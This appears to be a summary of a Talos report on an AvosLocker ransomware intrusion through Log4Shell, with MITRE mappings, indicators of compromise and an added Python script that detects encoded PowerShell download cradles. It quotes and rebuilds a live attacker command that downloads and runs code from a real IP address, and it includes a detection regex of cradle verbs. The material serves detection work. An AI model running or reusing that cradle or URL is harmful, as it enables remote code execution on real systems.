Avos ransomware group expands with new attack arsenal

Talos observed a month-long AvosLocker campaign leveraging Sliver, Cobalt Strike, and network scanners to move laterally after exploiting Log4Shell on exposed VMware Horizon UAG appliances. The incident underscores the importance of properly configured security appliances, timely patching, and a layered defense to detect and prevent post-exploitation encryption. #AvosLocker #Log4Shell

Keypoints

  • AvosLocker conducted a month-long campaign using Cobalt Strike, Sliver, and multiple commercial network scanners.
  • Initial access came through a pair of VMware Horizon Unified Access Gateways vulnerable to Log4Shell (CVE-2021-44228); the victim's Cisco security appliances were not properly configured, which let the attackers keep their foothold.
  • Threat actor profile: AvosLocker is a ransomware-as-a-service (RaaS) operation that recruits affiliates; it originally shipped only a Windows variant and now also offers a Linux variant.
  • Attack timeline includes WMI usage, encoded PowerShell commands, Sliver deployment, Mimikatz, a ZIP with Cobalt Strike beacons, and lateral movement via WMIC and PDQ Deploy.
  • Multiple threat actors and tools were present on the network, including DarkComet samples, suggesting parallel compromises.
  • Defense takeaway emphasizes configuring security appliances, applying updates, monitoring alerts, and deploying layered defenses with endpoint protections and behavior analysis.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The initial ingress point was a pair of VMware Horizon Unified Access Gateways vulnerable to Log4Shell. [‘The initial ingress point in this incident was a pair of VMWare Horizon Unified Access Gateways that were vulnerable to Log4Shell.’]
  • [T1047] Windows Management Instrumentation – The attackers used the WMI Provider Host (wmiprvse.exe) on the Windows Server that was the initial point of entry to run an encoded PowerShell script using the DownloadString method. [‘The attackers utilized the WMI Provider Host (wmiprvse.exe) on a Windows Server that was the initial point of entry to run an encoded PowerShell script using the DownloadString method at 01:41 UTC on Feb. 11.’]
  • [T1059.001] PowerShell – Encoded PowerShell commands (Base64 over UTF-16LE, passed via -enc) were used to download and execute payloads. [‘powershell.exe -exec bypass -enc aQBlAHgAIAAoAE4AZQB3AC…’]; [‘Decoded: iex (New-Object System.Net.WebClient).DownloadString('http://45[.]136[.]230[.]191:4000/D234R23');’]
  • [T1105] Ingress Tool Transfer – Sliver payload and other tools downloaded/executed after initial access. [‘On March 6, the attacker ran more PowerShell scripts to download and execute a Sliver payload labeled “vmware_kb.exe”.’]
  • [T1072] Software Deployment Tools – Proliferation of the ransomware and other tools across the network using PDQ Deploy, a legitimate deployment tool. [‘To proliferate the ransomware and other tools across the target network, the attackers used PDQ Deploy, a legitimate software deployment tool.’]
  • [T1003] OS Credential Dumping – Mimikatz was downloaded and executed for credential access. [‘…download and execute Mimikatz…’]
  • [T1046] Network Service Discovery (formerly Network Service Scanning) – Discovery using SoftPerfect Network Scanner to map the network. [‘…SoftPerfect Network Scanner.’]
  • [T1486] Data Encrypted for Impact – Ransomware encryption of the victims' files after payload delivery. [‘the victims' files were then encrypted and a ransom note was displayed, shown below.’]

Indicators of Compromise

  • [Hash] AvosLocker – ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f, cee38fd125aa3707dc77351dde129dba5e5aa978b9429ef3e09a95ebf127b46b
  • [Hash] Sliver – 7f0deab21a3773295319e7a0afca1bea792943de0041e22523eb0d61a1c155e2
  • [Hash] Mimikatz – cac73029ad6a543b423822923967f4c240d02516fab34185c59067896ac6eb99, 29a3ae1d32e249d01b39520cd1db27aa980e646d83694ff078424bed60df9304
  • [Hash] Cobalt Strike artifacts – 48514e6bb92dd9e24a16a4ab1c7c3bd89dad76bef53cec2a671821024fadcb2b, 61239d726c92c82f553200ecbec3ac18d251902fb9ca4d4f52263c82374a5b75
  • [URL] URLs – hxxp[://]45[.]136[.]230[.]191:4000/D234R23
  • [IP] IPs – 176[.]113[.]115[.]107, 45[.]136[.]230[.]191
  • [File] Filenames – watcher.exe, vmware_kb.exe, IIS Temporary Compressed Files.zip
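The T1047/T1059.001 entries above and the IOC list describe a pattern a detection engineer can act on directly: wmiprvse.exe spawning PowerShell with a -enc argument whose decoded body is a DownloadString cradle pointing at a known address. The script below is an added example, not code from the Talos post: it refangs the indicators listed above, decodes -enc payloads (Base64 over UTF-16LE, which is the step people most often get wrong), and scores Sysmon-style process-creation events against them. The event records are constructed for illustration; the encoded command in the first one is regenerated from the decoded command quoted on the page, so it reproduces the aQBlAHgAIAAoAE4AZQB3AC… prefix shown there. Field names (Image, ParentImage, CommandLine) follow Sysmon Event ID 1 naming and are an assumption about the log source.

```python
"""Decode PowerShell -enc payloads and match process-creation events against
the AvosLocker indicators above. Added example, not the Talos post's code."""
import base64
import re
from typing import List, Optional

# Indicators copied from the IOC list above, kept defanged at rest.
DEFANGED_URLS = ["hxxp[://]45[.]136[.]230[.]191:4000/D234R23"]
DEFANGED_IPS = ["176[.]113[.]115[.]107", "45[.]136[.]230[.]191"]
SUSPICIOUS_FILENAMES = {"watcher.exe", "vmware_kb.exe",
                        "iis temporary compressed files.zip"}

# Download-cradle verbs that a decoded -enc payload rarely contains for benign reasons.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|invoke-webrequest", re.I)
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand; the value is Base64 text.
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]+)", re.I)


def refang(ioc: str) -> str:
    """Turn a defanged indicator (hxxp[://], [.]) back into its live form."""
    return ioc.replace("hxxp", "http").replace("[://]", "://").replace("[.]", ".")


def encode_command(script: str) -> str:
    """Produce what PowerShell expects after -enc: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script from a '-enc <b64>' command line, or None.

    Decoding the bytes as UTF-8 instead of UTF-16LE yields 'i\\x00e\\x00x\\x00...'
    and every substring match on the result silently fails.
    """
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def analyze_event(event: dict) -> List[str]:
    """Return the reasons an event matches this campaign's tradecraft (empty if none)."""
    reasons = []
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")

    decoded = decode_encoded_command(cmd)
    if decoded and CRADLE_RE.search(decoded):
        reasons.append("encoded PowerShell download cradle (T1059.001)")

    # Match indicators against both the raw command line and the decoded body.
    haystack = cmd + ("\n" + decoded if decoded else "")
    for ioc in DEFANGED_URLS + DEFANGED_IPS:
        if refang(ioc) in haystack:
            reasons.append(f"known indicator: {ioc}")

    # The WMI provider host has no business launching shells on a server.
    if parent == "wmiprvse.exe" and image in ("powershell.exe", "cmd.exe"):
        reasons.append("shell spawned by WMI provider host (T1047)")

    if image in SUSPICIOUS_FILENAMES:
        reasons.append(f"known filename: {image}")
    return reasons


# The decoded command quoted on the page, re-encoded so the sample is exact.
PAGE_DECODED = ("iex (New-Object System.Net.WebClient).DownloadString('"
                + refang(DEFANGED_URLS[0]) + "');")

# Constructed Sysmon-style process-creation events (not from the incident logs).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\wmiprvse.exe",
     "CommandLine": "powershell.exe -exec bypass -enc " + encode_command(PAGE_DECODED)},
    {"Image": r"C:\Users\Public\vmware_kb.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "vmware_kb.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -enc " + encode_command("Get-Process | Sort-Object CPU")},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(_basename(ev["Image"]), "->", analyze_event(ev) or "clean")
```

The third event is a benign encoded command and produces no hit, which is the point of decoding rather than alerting on -enc alone: encoded PowerShell is common in legitimate automation, and the signal here is the combination of an unusual parent, a download cradle and a known address.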

Read more: https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html